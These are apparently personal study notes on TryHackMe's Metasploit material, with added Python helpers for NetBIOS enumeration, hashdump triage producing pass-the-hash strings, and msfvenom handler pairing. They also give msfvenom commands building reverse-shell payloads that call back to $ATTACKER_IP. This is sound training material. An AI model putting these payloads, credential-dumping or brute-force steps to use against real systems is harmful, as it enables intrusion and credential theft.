TryHackMe: Jr. Penetration Tester
- author:: Nathan Acks
- date:: 2022-04-14
Exploitation with Metasploit
Use search portscan to display the built-in Metasploit port scanners. Note that msfconsole needs to be run as root for many scans to work, just like Nmap. That said, in my experience the fancier TCP scans (for example, SYN) don’t work over a VPN… So maybe best to stick with Nmap.
Speaking of which, Nmap can also be called from inside msfconsole (like other shell commands).
The auxiliary/scanner/discovery/udp_sweep module will probe for common UDP services.
Metasploit has a variety of Samba/CIFS scanners too; use search scanner/smb to list them.
NetBIOS = Network Basic Input/Output System
TryHackMe emphasizes the importance of examining the usage of NetBIOS for potential vulnerabilities, though it’s a bit light on specifics about what this means in practice.
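Added example (mine, not from the notes or the TryHackMe room): in practice, "examining NetBIOS" usually starts with a node-status (NBSTAT) query on UDP/137, the same request that nbtscan, Nmap’s nbstat script and Metasploit’s auxiliary/scanner/netbios/nbname send. The script below builds that packet per RFC 1001/1002 and parses a constructed response (not a capture; the WORKSTATION/WORKGROUP names and the MAC are made up). Only send_nbstat() touches the network.

```python
"""NBSTAT (NetBIOS node status) query builder and response parser, RFC 1001/1002.

Added example, not from the original notes or the TryHackMe room. The sample
response is constructed, not captured; only send_nbstat() touches the network.
"""
import socket
import struct

NBNS_PORT = 137
QTYPE_NBSTAT = 0x0021
QCLASS_IN = 0x0001
# Well-known 16th-byte suffixes (partial list).
SUFFIXES = {0x00: "workstation/domain name", 0x03: "messenger", 0x1B: "domain master browser",
            0x1C: "domain controllers", 0x20: "file server (SMB)"}


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: 15 name bytes + suffix, each byte split into two
    nibbles offset by 'A' (32 chars; the wildcard '*' becomes 'CK' + 30 'A's)."""
    if name == "*":
        raw = b"*" + b"\x00" * 14                      # wildcard is NUL padded, not space padded
    else:
        raw = name.upper().encode("ascii")[:15].ljust(15, b" ")
    raw += bytes([suffix])
    return bytes(n for byte in raw for n in (0x41 + (byte >> 4), 0x41 + (byte & 0x0F)))


def build_nbstat_query(txid: int = 0x1337) -> bytes:
    """Header (ID, flags=0 unicast query, QDCOUNT=1) + one wildcard NBSTAT question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = bytes([32]) + encode_netbios_name("*") + b"\x00"
    return header + question + struct.pack("!HH", QTYPE_NBSTAT, QCLASS_IN)


def _skip_name(data: bytes, pos: int) -> int:
    """Advance past a DNS-style name, compressed pointer or not."""
    while True:
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:                      # 2-byte pointer, no terminator
            return pos + 2
        pos += 1 + length


def parse_nbstat_response(data: bytes) -> dict:
    """Return registered names (with group/active flags and role) and the MAC."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an NBNS response carrying an answer")
    pos = 12
    for _ in range(qdcount):                           # some stacks echo the question
        pos = _skip_name(data, pos) + 4
    pos = _skip_name(data, pos)
    rtype, _rclass, _ttl, _rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != QTYPE_NBSTAT:
        raise ValueError(f"unexpected RR type {rtype:#x}")
    num_names, pos = data[pos], pos + 1
    names = []
    for _ in range(num_names):                         # 15-byte name, suffix, 2-byte NAME_FLAGS
        raw, suffix = data[pos:pos + 15], data[pos + 15]
        name_flags = struct.unpack("!H", data[pos + 16:pos + 18])[0]
        pos += 18
        names.append({"name": raw.decode("ascii", "replace").rstrip(" \x00"),
                      "suffix": suffix, "role": SUFFIXES.get(suffix, "other"),
                      "group": bool(name_flags & 0x8000),   # G bit: group vs unique name
                      "active": bool(name_flags & 0x0400)}) # ACT bit
    mac = data[pos:pos + 6]                            # statistics block starts with the unit ID
    return {"txid": txid, "names": names, "mac": ":".join(f"{b:02x}" for b in mac)}


def _sample_response(txid: int = 0x1337) -> bytes:
    """Constructed reply from host WORKSTATION in workgroup WORKGROUP (made-up MAC)."""
    entries = [(b"WORKSTATION", 0x00, 0x0400), (b"WORKGROUP", 0x00, 0x8400),
               (b"WORKSTATION", 0x20, 0x0400)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += name.ljust(15, b" ") + bytes([suffix]) + struct.pack("!H", nflags)
    rdata += bytes.fromhex("000c29aabbcc") + b"\x00" * 40   # unit ID + zeroed statistics
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr = bytes([32]) + encode_netbios_name("*") + b"\x00"
    rr += struct.pack("!HHIH", QTYPE_NBSTAT, QCLASS_IN, 0, len(rdata))
    return header + rr + rdata


SAMPLE_RESPONSE = _sample_response()


def send_nbstat(host: str, timeout: float = 2.0) -> dict:
    """Live query against one host (needs UDP/137 reachability); not run offline."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_nbstat_query(), (host, NBNS_PORT))
        data, _ = sock.recvfrom(1024)
    return parse_nbstat_response(data)


if __name__ == "__main__":
    import sys
    print(send_nbstat(sys.argv[1]) if len(sys.argv) > 1 else parse_nbstat_response(SAMPLE_RESPONSE))
```

The interesting output is the name table: a group name with suffix 0x00 is the workgroup or domain, a unique name with suffix 0x20 means the host is offering SMB file service, and suffixes 0x1B/0x1C identify domain controllers, which is the kind of thing worth noticing before moving on to the SMB scanners.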
Use show advanced to list a module’s advanced options (beyond what show options displays).
The auxiliary/scanner/http/http_version module will give you HTTP server version information.
The auxiliary/scanner/smb/smb_login module will allow you to brute-force SMB logins (usernames and/or passwords) using one or more wordlists.
The Metasploit Database
Get basic database status using db_status.
Create and delete workspaces (engagements) with workspace -a <name> to add and workspace -d <name> to delete. Switch between workspaces using workspace <name>.
Use db_nmap to run Nmap (all of the regular options work) and dump the results into the Metasploit database.
The hosts and services commands can then be used to display the, well, hosts and services logged by Metasploit during an engagement. Both commands support an -S search parameter, and the matching hosts can be pushed straight into RHOSTS with the -R flag (for example, services -S smb -R).
Show the payloads available for a particular exploit using show payloads. Use set payload to set the payload for the exploit; re-run show options afterwards to check whether the payload has added any additional options that need to be set before exploitation.
To dump NTLM hashes from Meterpreter, use the hashdump command. Each line is colon-separated; normally only the first four fields are relevant:
- The username
- RID (the relative identifier: the last component of the account’s SID, after the final hyphen; 500 is the built-in Administrator, 501 Guest, and ordinary local accounts start at 1000)
- The user’s LM password hash (aad3b435b51404eeaad3b435b51404ee whenever LM hashing is disabled, which is the default on modern Windows)
- The user’s NTLM password hash
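Added example (mine, not from the notes): a small triage script for hashdump output. The sample lines are constructed; the hash constants are the publicly known values for an empty password, for "password" (LM and NT) and for "123456" (NT). It flags empty-password accounts, accounts that still have a real LM hash, users who share the same NT hash (same password), and emits the LM:NT string that pass-the-hash tools and psexec-style modules accept.

```python
"""Triage of Meterpreter `hashdump` output (user:RID:LM:NT::: per line).

Added example, not from the original notes. SAMPLE_HASHDUMP is constructed:
8846f7ea... is the NT hash of "password", e52cac67... its LM hash,
32ed87bd... the NT hash of "123456"; the EMPTY_* constants are the hashes of
an empty password.
"""
from collections import defaultdict
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM hashing is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1002:e52cac67419a9a224a3b108f3fa6cb6d:32ed87bdb5fdc5e9cba88547376818d4:::
"""


@dataclass(frozen=True)
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def builtin(self) -> bool:
        return self.rid < 1000              # 500 Administrator, 501 Guest, 503 DefaultAccount, ...

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_present(self) -> bool:
        return self.lm != EMPTY_LM          # a real LM hash: legacy setting, cracks in minutes

    @property
    def pth(self) -> str:
        """LM:NT form accepted as SMBPass by psexec-style modules and other PtH tools."""
        return f"{self.lm}:{self.nt}"


def parse_hashdump(text: str) -> list:
    """Parse hashdump lines; tolerates blank lines and "[*] ..." status output."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"unexpected hashdump line: {line!r}")
        user, rid, lm, nt = fields[:4]
        if not (rid.isdigit() and len(lm) == 32 and len(nt) == 32):
            raise ValueError(f"malformed fields in: {line!r}")
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def triage(accounts: list) -> dict:
    """Group the findings a pentester acts on first."""
    by_nt = defaultdict(list)
    for a in accounts:
        if not a.empty_password:
            by_nt[a.nt].append(a.user)
    return {
        "empty_password": [a.user for a in accounts if a.empty_password],
        "lm_present": [a.user for a in accounts if a.lm_present],
        "shared_passwords": {nt: users for nt, users in by_nt.items() if len(users) > 1},
        "pth_candidates": {a.user: a.pth for a in accounts if not a.empty_password},
    }


if __name__ == "__main__":
    for key, value in triage(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{key}: {value}")
```

Note that an empty-password hash on Guest or DefaultAccount is normal (those accounts are disabled by default); it is only interesting on an enabled account. Shared NT hashes are worth more than they look: cracking one password gives you every account in that group.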
Use sessions to, well, manage your sessions (most useful when you’ve backgrounded a payload and/or are working with multiple targets).
Msfvenom is a tool to create custom versions of Metasploit payloads, written out in a variety of different binary formats and scripts (and optionally run through an encoder).
Use msfvenom --list formats to see the available output formats (and --list encoders for the encoders).
```bash
# 32-bit Linux ELF Meterpreter payload
msfvenom -p linux/x86/meterpreter/reverse_tcp \
  LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f elf > rev_shell

# 32-bit Windows executable Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe > rev_shell.exe

# PHP Meterpreter payload (stageless: note the underscore in meterpreter_reverse_tcp)
msfvenom -p php/meterpreter_reverse_tcp \
  LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f raw > rev_shell.php

# ASP Meterpreter payload (the same Windows payload, wrapped as an ASP page)
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f asp > rev_shell.asp

# Python reverse shell (a plain reverse shell, not Meterpreter, despite where TryHackMe lists it)
msfvenom -p cmd/unix/reverse_python \
  LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f raw > rev_shell.py
```
Use the exploit/multi/handler module in Metasploit to catch the shells produced using Msfvenom (note that you’ll need to use set payload to tell Metasploit what it’s catching, and it must be exactly the payload you gave msfvenom, including staged meterpreter/reverse_tcp versus stageless meterpreter_reverse_tcp). We can catch both regular reverse shells and Meterpreter sessions this way.
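Added example (mine, not from the notes or the TryHackMe room): a helper that pairs an msfvenom command with its handler resource script and checks for the classic mismatch where the handler is set to the staged payload while msfvenom built the stageless one (or the other way round). The function names and the STAGES/FORMATS tables are my own; the payload names, msfvenom flags and handler commands are standard Metasploit ones.

```python
"""Pairing an msfvenom payload with its exploit/multi/handler.

Added example, not from the original notes or the TryHackMe room. Helper names
and the STAGES/FORMATS tables are mine (and partial); payload names, msfvenom
flags and handler commands are the standard Metasploit ones.
"""

# Metasploit "stage" components: a stager (reverse_*/bind_*) right after one of
# these means a staged payload (meterpreter/reverse_tcp). Stageless payloads
# fold both into one component (meterpreter_reverse_tcp) or are single like
# cmd/unix/reverse_python.
STAGES = {"meterpreter", "shell", "vncinject", "dllinject"}
# Output formats that fit each platform prefix (only the ones used in these notes).
FORMATS = {"windows": {"exe", "asp", "dll"}, "linux": {"elf"}, "php": {"raw"}, "cmd": {"raw"}}


def is_staged(payload: str) -> bool:
    parts = payload.split("/")
    return (len(parts) >= 2 and parts[-2] in STAGES
            and parts[-1].split("_")[0] in ("reverse", "bind"))


def msfvenom_cmd(payload: str, lhost: str, lport: int, fmt: str, outfile: str) -> str:
    """The generation command; refuses a format that cannot run on the payload's platform."""
    platform = payload.split("/")[0]
    if fmt not in FORMATS.get(platform, set()):
        raise ValueError(f"format {fmt!r} does not fit a {platform} payload")
    return f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f {fmt} -o {outfile}"


def handler_rc(payload: str, lhost: str, lport: int) -> str:
    """Resource script for `msfconsole -q -r handler.rc`. `exploit -j -z` backgrounds
    the handler and does not auto-interact, so it keeps catching further callbacks."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j -z",
    ]) + "\n"


def check_pair(venom: dict, handler: dict) -> list:
    """Return human-readable mismatches between the built payload and the handler."""
    problems = []
    if venom["payload"] != handler["payload"]:
        if is_staged(venom["payload"]) != is_staged(handler["payload"]):
            problems.append("staged/stageless mismatch: msfvenom built "
                            f"{venom['payload']} but the handler expects {handler['payload']}")
        else:
            problems.append(f"payload differs: {venom['payload']} vs {handler['payload']}")
    for key in ("lhost", "lport"):
        if str(venom[key]) != str(handler[key]):
            problems.append(f"{key.upper()} differs: {venom[key]} vs {handler[key]}")
    return problems


if __name__ == "__main__":
    venom = {"payload": "php/meterpreter_reverse_tcp", "lhost": "10.0.0.5", "lport": 4444}
    handler = {"payload": "php/meterpreter/reverse_tcp", "lhost": "10.0.0.5", "lport": 4444}
    print(msfvenom_cmd(venom["payload"], venom["lhost"], venom["lport"], "raw", "rev_shell.php"))
    print(handler_rc(handler["payload"], handler["lhost"], handler["lport"]))
    for problem in check_pair(venom, handler):
        print("!!", problem)
```

A staged/stageless mismatch is the usual reason a callback shows up as "Sending stage" followed by a dead session, or as no session at all: the handler and the payload have to agree on exactly what will cross the wire, not just on the port.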